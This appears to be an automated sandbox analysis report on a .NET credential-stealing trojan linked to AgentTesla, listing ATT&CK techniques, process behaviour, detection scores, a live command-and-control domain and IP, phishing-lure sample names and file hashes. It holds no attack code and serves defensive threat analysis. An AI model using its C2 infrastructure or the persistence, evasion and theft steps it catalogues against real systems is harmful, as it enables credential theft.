                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe PID: 5616, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe PID: 7272, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: tXBTtgndxsp.exe PID: 8128, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		11
                    Disable or Modify Tools                    		1
                    OS Credential Dumping                    		1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		1
                    Windows Service                    		1
                    Windows Service                    		1
                    Deobfuscate/Decode Files or Information                    		21
                    Input Capture                    		24
                    System Information Discovery                    		Remote Desktop Protocol1
                    Data from Local System                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt1
                    Scheduled Task/Job                    		111
                    Process Injection                    		3
                    Obfuscated Files or Information                    		Security Account Manager1
                    Query Registry                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                    Scheduled Task/Job                    		12
                    Software Packing                    		NTDS211
                    Security Software Discovery                    		Distributed Component Object Model21
                    Input Capture                    		2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading                    		LSA Secrets1
                    Process Discovery                    		SSH1
                    Clipboard Data                    		23
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading                    		Cached Domain Credentials141
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                    Virtualization/Sandbox Evasion                    		DCSync1
                    Application Window Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                    Process Injection                    		Proc Filesystem1
                    System Network Configuration Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1419145 Sample: SecuriteInfo.com.Trojan.Mul... Startdate: 03/04/2024 Architecture: WINDOWS Score: 100 40 nl9.nlkoddos.com 2->40 42 time.windows.com 2->42 44 api.ipify.org 2->44 50 Found malware configuration 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 Antivirus / Scanner detection for submitted sample 2->54 56 9 other signatures 2->56 8 SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe 7 2->8         started        12 tXBTtgndxsp.exe 5 2->12         started        signatures3 process4 file5 36 C:\Users\user\AppData\...\tXBTtgndxsp.exe, PE32 8->36 dropped 38 C:\Users\user\AppData\Local\...\tmpD46C.tmp, XML 8->38 dropped 58 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 8->58 60 Uses schtasks.exe or at.exe to add and modify task schedules 8->60 62 Adds a directory exclusion to Windows Defender 8->62 64 Injects a PE file into a foreign processes 8->64 14 SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe 15 2 8->14         started        18 powershell.exe 23 8->18         started        20 schtasks.exe 1 8->20         started        22 svchost.exe 8->22         started        66 Antivirus detection for dropped file 12->66 68 Multi AV Scanner detection for dropped file 12->68 70 Machine Learning detection for dropped file 12->70 24 tXBTtgndxsp.exe 12->24         started        26 schtasks.exe 1 12->26         started        signatures6 process7 dnsIp8 46 nl9.nlkoddos.com 89.249.49.141, 49709, 49712, 49721 IPCTRU Russian Federation 14->46 48 api.ipify.org 104.26.12.205, 443, 49707, 49711 CLOUDFLARENETUS United States 14->48 28 WmiPrvSE.exe 18->28         started        30 conhost.exe 18->30         started        32 conhost.exe 20->32         started        72 Tries to steal Mail credentials (via file / registry access) 24->72 74 Tries to harvest and steal browser information (history, passwords, etc) 24->74 76 Installs a global keyboard hook 24->76 34 conhost.exe 26->34         started        signatures9 process10

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe16%ReversingLabs
                    SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe32%VirustotalBrowse
                    SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe100%AviraHEUR/AGEN.1323752
                    SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe100%AviraHEUR/AGEN.1323752
                    C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe16%ReversingLabs
                    C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe32%VirustotalBrowse

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    SourceDetectionScannerLabelLink
                    nl9.nlkoddos.com0%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    https://sectigo.com/CPS00%URL Reputationsafe
                    https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
                    http://ocsp.comodo0%Avira URL Cloudsafe
                    http://nl9.nlkoddos.com0%Avira URL Cloudsafe
                    http://nl9.nlkoddos.com0%VirustotalBrowse

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    api.ipify.org
                    		104.26.12.205
                    		truefalse
                      		high
                      nl9.nlkoddos.com
                      		89.249.49.141
                      		truetrueunknown
                      time.windows.com
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://api.ipify.org/false
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://api.ipify.orgSecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000000.00000002.1250066076.000000000393E000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3700297871.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3700333358.0000000002C41000.00000004.00000800.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3688800545.0000000000426000.00000040.00000400.00020000.00000000.sdmpfalse
                            		high
                            https://sectigo.com/CPS0SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3700297871.0000000002EED000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3723701620.0000000009588000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3692396965.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3700297871.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3723701620.0000000009500000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3700297871.0000000002F07000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3700297871.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3710478603.0000000006762000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3700297871.0000000002F49000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3700297871.000000000318A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3700297871.0000000003074000.00000004.00000800.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3700333358.0000000002E79000.00000004.00000800.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3700333358.000000000311B000.00000004.00000800.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3700333358.0000000002FAA000.00000004.00000800.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3693836646.0000000000F03000.00000004.00000020.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3712423280.000000000643F000.00000004.00000020.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3700333358.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3721192525.0000000009470000.00000004.00000020.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3700333358.0000000002C8B000.00000004.00000800.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3700333358.0000000002CFC000.00000004.00000800.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3693836646.0000000000EB9000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://account.dyn.com/SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000000.00000002.1250066076.000000000393E000.00000004.00000800.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3688800545.0000000000426000.00000040.00000400.00020000.00000000.sdmpfalse
                              		high
                              https://api.ipify.org/tSecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3700297871.0000000002E71000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000000.00000002.1249280177.00000000027B2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3700297871.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000008.00000002.1294893629.0000000002592000.00000004.00000800.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3700333358.0000000002C41000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.chiark.greenend.org.uk/~sgtatham/putty/0SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, tXBTtgndxsp.exe.0.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://ocsp.comodotXBTtgndxsp.exe, 00000014.00000002.3693836646.0000000000F03000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://nl9.nlkoddos.comSecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3700297871.0000000002EE5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3700297871.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3700297871.0000000002F07000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3700297871.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3700297871.0000000002F49000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3700297871.000000000318A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3700297871.0000000003074000.00000004.00000800.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3700333358.0000000002E79000.00000004.00000800.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3700333358.000000000311B000.00000004.00000800.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3700333358.0000000002FAA000.00000004.00000800.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3700333358.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3700333358.0000000002F0B000.00000004.00000800.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3700333358.00000000030B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  104.26.12.205
                                  		api.ipify.orgUnited States
                                  		13335CLOUDFLARENETUSfalse
                                  89.249.49.141
                                  		nl9.nlkoddos.comRussian Federation
                                  		41310IPCTRUtrue

                                  General Information

                                  Joe Sandbox version:40.0.0 Tourmaline
                                  Analysis ID:1419145
                                  Start date and time:2024-04-03 06:18:12 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 10m 30s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:29
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.evad.winEXE@17/11@3/2
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 97%
                                  • Number of executed functions: 183
                                  • Number of non-executed functions: 8
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                                  Warnings

                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 40.119.6.228
                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, twc.trafficmanager.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtCreateKey calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Report size getting too big, too many NtReadVirtualMemory calls found.

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  06:19:07API Interceptor8913685x Sleep call for process: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe modified
                                  06:19:09Task SchedulerRun new task: tXBTtgndxsp path: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe
                                  06:19:09API Interceptor12x Sleep call for process: powershell.exe modified
                                  06:19:11API Interceptor6672040x Sleep call for process: tXBTtgndxsp.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  104.26.12.205Sky-Beta.exeGet hashmaliciousStealitBrowse
                                  • api.ipify.org/?format=json
                                  SecuriteInfo.com.Backdoor.Win32.Agent.myuuxz.13708.17224.exeGet hashmaliciousBunny LoaderBrowse
                                  • api.ipify.org/
                                  lods.cmdGet hashmaliciousRemcosBrowse
                                  • api.ipify.org/
                                  89.249.49.141SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.15700.19501.exeGet hashmaliciousAgentTeslaBrowse
                                    FedEx Express_AWB102235516763.PDF.gz.exeGet hashmaliciousAgentTeslaBrowse
                                      DHL Tracking 02.04.2024.exeGet hashmaliciousAgentTeslaBrowse
                                        DHL Tracking 01.04.2024.exeGet hashmaliciousAgentTeslaBrowse
                                          DHL_LHER000678175.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            FedEx_AWB#53203024643.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              Maersk Line Shipping documents.exeGet hashmaliciousAgentTeslaBrowse
                                                FedEx Receipt_AWB#53021024643.exeGet hashmaliciousAgentTeslaBrowse
                                                  SecuriteInfo.com.Win32.PWSX-gen.24231.18855.exeGet hashmaliciousAgentTeslaBrowse
                                                    DHL Receipt_21138777109.exeGet hashmaliciousAgentTeslaBrowse

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      api.ipify.orgSecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.15700.19501.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.13.205
                                                      Sky-Beta-Setup.exeGet hashmaliciousStealitBrowse
                                                      • 104.26.13.205
                                                      Sky-Beta-Setup.exeGet hashmaliciousStealitBrowse
                                                      • 172.67.74.152
                                                      Request_For_ Quotation.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                      • 172.67.74.152
                                                      hesaphareketi-0112024.Scr.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.12.205
                                                      hesaphareketi-01.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.13.205
                                                      FedEx Express_AWB102235516763.PDF.gz.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.13.205
                                                      DHL Tracking 02.04.2024.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.12.205
                                                      agamogenetic.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 104.26.12.205
                                                      DHL Waybill & Shipping Documents.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.13.205
                                                      nl9.nlkoddos.comSecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.15700.19501.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 89.249.49.141
                                                      FedEx Express_AWB102235516763.PDF.gz.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 89.249.49.141
                                                      DHL Tracking 02.04.2024.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 89.249.49.141
                                                      DHL Tracking 01.04.2024.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 89.249.49.141
                                                      DHL_LHER000678175.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      • 89.249.49.141
                                                      FedEx_AWB#53203024643.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      • 89.249.49.141
                                                      Maersk Line Shipping documents.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 89.249.49.141
                                                      FedEx Receipt_AWB#53021024643.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 89.249.49.141
                                                      SecuriteInfo.com.Win32.PWSX-gen.24231.18855.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 89.249.49.141
                                                      DHL Receipt_21138777109.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 89.249.49.141

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      CLOUDFLARENETUSSecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.15700.19501.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.13.205
                                                      https://attemptingto.takeyoutoyourdomain.com/lachlan.tipler@lendlease.comGet hashmaliciousHTMLPhisherBrowse
                                                      • 104.17.2.184
                                                      file.exeGet hashmaliciousLummaCBrowse
                                                      • 104.21.72.132
                                                      https://www.evernote.com/shard/s552/sh/411b8c38-1480-cda3-f001-f816c49f703f/uRh6bfj69yGnZ1eQwP_G4v_jhDHo3CJrKQvlhg51RfeJOz6BkV4CCSNrEgGet hashmaliciousUnknownBrowse
                                                      • 104.17.25.14
                                                      https://pub-786875329a4d4b229f9b36d89910de25.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                      • 104.18.11.207
                                                      https://bafybeidi6dmg4h3ws6ttkejiyralaxrtcccbqjwk7y7afk4z2jqqhtlftu.ipfs.dweb.link/rfcbnff73.htmlGet hashmaliciousHTMLPhisherBrowse
                                                      • 104.17.25.14
                                                      https://pub-422f33674c4b4fe182123a25dbb97378.r2.dev/secu3.htmlGet hashmaliciousHTMLPhisherBrowse
                                                      • 104.17.25.14
                                                      https://hon-3mo.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                      • 172.66.47.204
                                                      SecuriteInfo.com.Trojan.PWS.Siggen3.25256.942.20710.exeGet hashmaliciousExela Stealer, XmrigBrowse
                                                      • 162.159.135.232
                                                      https://t1.172-86-100-120.cprapid.com/p/Get hashmaliciousPayPal PhisherBrowse
                                                      • 162.159.135.42
                                                      IPCTRUSecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.15700.19501.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 89.249.49.141
                                                      FedEx Express_AWB102235516763.PDF.gz.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 89.249.49.141
                                                      DHL Tracking 02.04.2024.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 89.249.49.141
                                                      DHL Tracking 01.04.2024.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 89.249.49.141
                                                      DHL_LHER000678175.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      • 89.249.49.141
                                                      FedEx_AWB#53203024643.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      • 89.249.49.141
                                                      Maersk Line Shipping documents.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 89.249.49.141
                                                      FedEx Receipt_AWB#53021024643.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 89.249.49.141
                                                      SecuriteInfo.com.Win32.PWSX-gen.24231.18855.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 89.249.49.141
                                                      DHL Receipt_21138777109.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 89.249.49.141

                                                      JA3 Fingerprints

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      3b5074b1b5d032e5620f69f9f700ff0eSecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.15700.19501.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.12.205
                                                      SecuriteInfo.com.Win64.TrojanX-gen.3573.27902.exeGet hashmaliciousXWormBrowse
                                                      • 104.26.12.205
                                                      SecuriteInfo.com.Win64.TrojanX-gen.14614.17747.exeGet hashmaliciousXWormBrowse
                                                      • 104.26.12.205
                                                      co-trustee delegation agreement 66445.jsGet hashmaliciousUnknownBrowse
                                                      • 104.26.12.205
                                                      co-trustee delegation agreement 66445.jsGet hashmaliciousUnknownBrowse
                                                      • 104.26.12.205
                                                      tH5XAQMkVB.exeGet hashmaliciousUnknownBrowse
                                                      • 104.26.12.205
                                                      matt bolt.pptx.htmlGet hashmaliciousUnknownBrowse
                                                      • 104.26.12.205
                                                      hesaphareketi-01.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.12.205
                                                      hesaphareketi-01.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.12.205
                                                      hesaphareketi-0112024.Scr.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.12.205

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.log

                                                      Download File
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1216
                                                      Entropy (8bit):5.34331486778365
                                                      Encrypted:false
                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                      Malicious:false
                                                      Reputation:high, very likely benign file
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\tXBTtgndxsp.exe.log

                                                      Download File
                                                      Process:C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1216
                                                      Entropy (8bit):5.34331486778365
                                                      Encrypted:false
                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                      Malicious:false
                                                      Reputation:high, very likely benign file
